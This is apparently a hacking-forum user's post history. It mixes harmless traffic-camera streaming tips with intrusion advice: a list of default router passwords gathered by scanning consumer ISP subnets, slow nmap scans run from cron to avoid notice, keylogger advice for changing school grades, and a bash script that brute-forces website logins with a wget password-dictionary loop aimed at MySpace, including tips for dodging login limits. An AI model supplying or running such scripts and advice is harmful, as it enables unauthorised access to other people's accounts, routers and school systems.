tetsuharu

Members
  • Content count

    15
  • Joined

  • Last visited

Community Reputation

0 Neutral

About tetsuharu

  • Rank
    I broke 10 posts and all I got was this lousy title!
  1. its not done uploading. give it some time. it's taking longer than i thought. 700M seems like a lot to serve up for free to binrev anyway :/ maybe ill delete it in a couple days.
  2. Oddly enough, though I've posted maybe thrice on these forums, I do have that documentary. I grabbed it off a KDX server last week. Hackers in Wonderland [ENG].avi I wont keep it up forever though ;-)
  3. Oh hey, I found a page explaining pipes to me. I really wish I understood how these fifo pipe files worked before, they're so damn easy! mkfifo a.mjpeg wget -O a.mjpeg "http://video.dot.state.mn.us/video/stream?id=850&rate=25&duration=1000&size=704x480" 2>/dev/null & mplayer -cache 32 -demuxer 35 a.mjpeg and it works like magic! mkfifo.. that was all it took...
  4. that's what I like to hear!
  5. some videos i put together just for fun.. my awkward fetish for traffic cameras. actually NYC cams camfdm.avi (kmfdm-new american century) 102.avi (prodigy-voodoo people) my favorite cam, C850 850_monokrome.avi (monokuroomu from some ghost in the shell) most recent 30_102_218_322_328_419_850.avi (Shantel-unending)
  6. yes. source
  7. Illegal activities are always changing. Everyone was confused and interested when these 'hackers', the kind that were breaking into systems and doing naughty things, came around and we had no laws to define it. Before the law was made, it wasn't illegal. Nowadays, if the administration of this nation has a beef with you in any way they can call you an immigrant or 'unlawful enemy combatant' and revoke your right to habeas corpus and legal representation to prove you are a citizen. The powers that be hate learned individuals who amass power. I don't believe secretly gaining access to private networks is all that bad. The govnment does because it encroaches on their power. and I second the cheesecake
  8. hey hey now, I wasn't insulting you, I have faith in your abilities, and was offering to help find you some sample routers. I run scans once in a while and took the time to gather you a list of potential routers. On second thought, maybe I'll just PM the list. Suffice it to say, on the record, common passwords I tested for: admin:admin admin:pass admin:password root:admin root:dreambox isco:cisco root:root
  9. What I've done with surveillance cameras may not be considered 'hacking', but I find it terribly amusing. Google searches revealing accidentally-public or purposefully public security cameras are fun, but sometimes you want these nifty tricks to be useful, use your available resources for some given purpose. Personally, I love traffic cams. I've looked at traffic cams in New York and California because my own Minnesotan DOT public cams have such a low framerate, from 3-5 seconds per frame, whereas Cali has rtsp and mmsh streams and NYC has 3fps cams. I sought about finding the streams. I accidentally found the corporate-logon for their streams http://www.dot.state.mn.us/tmc/trafficinfo...ras_stream.html by hacking off filenames and subdirectories. You're supposed to register and get yourself submitted to this authentication table, "tomcat_user" on internal host "tms-iris"'s jdbc database "video" on port 5432. The software they use to display their streams is a simple java applet, with downloadable source code. http://video.dot.state.mn.us/video/lib/ I downloaded the jar files, unzipped them, de'compile'd the bytecode into some terrifically readable java source files with jad http://www.kpdus.com/jad.html and eventually found the method they use to access streams, of the form: http://video.dot.state.mn.us/video/stream?...ration=DURATION the stream is in an odd MJPEG form, to view it I wget it, sleep a few seconds, then use mplayer to play it. Sometimes it kills after a while, but I set up an endless loop for that and all is well. I could not have simply sniffed traffic to get this address, the java applet requires authentication. xml file containing cam information: http://data.dot.state.mn.us/dds/cameras.xml.bak in the http://data.dot.state.mn.us/dds/ directory there are also some neat traffic related xml documents, as well an html document explaining their 'Mn/DOT Unified Traffic Data File Format' Anywho, that's how I did it. Surveillance cameras seem like the thing to get if you get access to some cool network. It's a bandwidth hog, but what can I do. I've thought about gaining some executive permissions on the server to get a real-time MJPEG to xvid encoder, to save them bandwidth -- a constructive hack , save them bandwidth. Have you done anything cool with security cameras? Have you gotten access to any cool ones? Know of any tricks that might be useful to the rest of us?
  10. Not really that useful unless you can find the hashed password somehow. If you can, sweet.
  11. not that we really need a clone. If we were going to have a clone, we aughtta add functionality to the parted guis and other partition management guis instead of another windowed applicaiton. You just have to configure it on command line once, anyway, add it to fstab and it's an every-day thing.
  12. I've found quite a lot of home networking routers. If you know your http protocol, interfacing with it isnt all that difficult, just write your headers and the right POST-DATA to the right pages with the right cookies, and you dont even have to listen back (but probably want to, to make sure it worked). A lot of these routers are available on the internet. I know its one of those things that'll 'get you caught', and indeed my ISP questioned me once about it (thought I had a virus). If you scan large consumer ISP subnets for http servers, relatively slowly, perhaps daily (nmap -T 1 IP/20 in a cronjob with a list of IPs to search for) you will find lots of http servers. If you want a few to look at, PM me.
  13. The answer to your question is Yes. You need to worry about what kind of keylogger you're going to use, some will be picked up by virus scanners, and you trust me every school has virus scanners and some sort of security management, these arent the good old days, and this isnt elementary school (i believe). You will also need access to their system. If you can get unsupervised access (unlikely, most computer on today's school networks that i've seen have monitors on them. I've had windows closed for browsing the wrong websites ) you will already have the powergrade software installed and ready to go. Then you get to figure out how to use it in the few minutes you have it. Get a copy of the software, if you can, and play with it a little. Yes, though. But you might get caught. They learned over the 10-20 years of people walking in and changing their grades. Try a hardware keylogger, also. didnt mention that. good tool.
  14. Wow, what a mess. Uhm.. Try not to respond to trolls next time. Sure they block your path to the bridge, but you can walk around em. About the original question, which the original poster may never come back to read... I've never learned to use brutus, but it seems complicated. Maybe someday it'll be worth learning. I can show you how to make a simple brute forcer in a shell script, though. Mighty powerful is wget. First you find out the POST-DATA for the login form. You can read the html for the forms and patch it together, open a packet sniffer which will provide a very nice little line: ie, myspace: here is the client side communication to the myspace server. the post-data, specifically, is the "email=tetsu2051%40yahoo.com&password=godlovessexnmoney&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9" you can use post-data and actually log into myspace or any other authenticated system with wget by using the option --post-data. in this case, it would be wget --post-data="email=tetsu2051%40yahoo.com&password=godlovessexnmoney&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9" "http://www.myspace.com/index.cfm?fuseaction=login.process&MyToken=50e6344b-f9e0-45f0-8564-c5d19839e2d1" you should notice the password field obvious in the post-data, ...&password=SOMEPASSWORD&... There also seems to be a login session or 'token' here, so you might have to wget a login page first and grep for this MyToken variable. If this isnt the case, the following will work. make a file with passwords to try, and put it in a file, like dictionary.txt make a loop that will loop through the wget command, substituting your password for the attempting password. for PASS in `cat dictionary.txt`; do wget --post-data="email=tetsu2051%40yahoo.com&password=$PASS&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9" "http://www.myspace.com/index.cfm?fuseaction=login.process&MyToken=50e6344b-f9e0-45f0-8564-c5d19839e2d1" done This will attempt to log in with every password. You may want to output the file (-O somefile.html) and grep for html you will get only if logged in properly, and write an conditional statement in the for loop to test if login has been successful. I don't feel like doing this, so here's psuedo code for PASS in `cat dictionary.txt`; do wget --post-data="email=tetsu2051%40yahoo.com&password=$PASS&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9" "http://www.myspace.com/index.cfm?fuseaction=login.process&MyToken=50e6344b-f9e0-45f0-8564-c5d19839e2d1" -O attempt.html grep "SOME HTML THAT IS ONLY IN LOGIN PAGE" attempt.html && echo $PASS && break; done the break will break out of the for loop and procede from done if attempt.html contains the code. In fact, you could pipe wget to grep, and make it a neat (albeit slightly irritating) one-liner for PASS in `cat dictionary.txt`; do wget --post-data="...&password=$PASS&..." "http://www.myspace.com/index.cfm?fuseaction=login.process" -O - | grep "SOME HTML THAT IS ONLY IN LOGIN PAGE" attempt.html && echo $PASS && break; done If you want more info, you can use some conditional statements inside the for loop. this code will only print out anything if a login is successful. You can use numbered lines and some bash arithmetic if you want. for instance, linenum=`nl dictionary.txt | grep $PASS | awk '{print $1}'`; if [ $[$linenum%10] -eq 0 ]; then echo $PASS; fi; will print out every 10th password. If you wanted to go this route you may even want to numberline your dictionary file and awk the password out. More importantly, in brute-forcing, time is most important, and every fraction of second you add between sends could be hours of testing. Also be aware of login limits, which most sites use nowadays. You may be able to attempt to brute force it, just very very very slowly, like over the course of a week. Patience is a virtue, of course, if you really want access. If timing is not a problem, you will want to multi-thread, like brutus does. Multithreading can be accomplished with forks, the & symbol after a command. You do not want to start all of them at once. The site will immediately notice. It's almost akin to a DDoS, which no one likes, and is totally obvious. A simple, off the top of my head idea would be to use a simple sleep in a while loop. I know it's not very awesome, but it works if I'm pressed for time. (I'll use a read while loop here instead, its easier. ) test() { wget --post-data="...&password=$1&..." "http://somesite.com/login.cfm" | grep "SOME HTML" && echo $1 >> worked.txt } while read a; test $a & read a; test $a & read a; test $a & read a; test $a & sleep 5; # should test this experimentally, try 5 logins at once and use time or something to test it done < dictionary.txt This is as complicated as I've ever gotten, if anyone has better solutions please fill me in! (none of this code has been tested.)